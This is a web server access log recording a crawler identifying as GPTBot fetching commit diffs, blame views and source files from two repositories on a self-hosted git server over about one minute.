git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 19862] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 226072] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15515] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 193781] [Gzip 19.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15458] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 18030] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 19842] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 193815] [Gzip 19.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 18299] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 18298] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" -[17/Feb/2026:13:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 74.7.227.38] [Length 10757] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" -[17/Feb/2026:13:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" -[17/Feb/2026:13:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 20169] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 174875] [Gzip 16.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 19863] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 226089] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 20165] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15513] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 196577] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11476] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:13:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9504] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:13:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 558459] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" -[17/Feb/2026:13:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27636] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 20170] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=ignore-all" -[17/Feb/2026:13:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" [Client 74.7.227.38] [Length 14511] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" [Client 74.7.227.38] [Length 14508] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" [Client 74.7.227.38] [Length 12792] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:44:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" -[17/Feb/2026:13:44:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" -[17/Feb/2026:13:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10282] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 74.7.227.38] [Length 11046] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 74.7.227.38] [Length 11672] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode" -[17/Feb/2026:13:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32569] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" -[17/Feb/2026:13:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" -[17/Feb/2026:13:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" [Client 74.7.227.38] [Length 9981] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" [Client 74.7.227.38] [Length 9986] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13689] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13687] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12240] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10973] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17116] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17115] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 16980] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 16980] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" -[17/Feb/2026:13:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" -[17/Feb/2026:13:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10132] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist" -[17/Feb/2026:13:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13288] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13287] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 2120] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:13:45:10 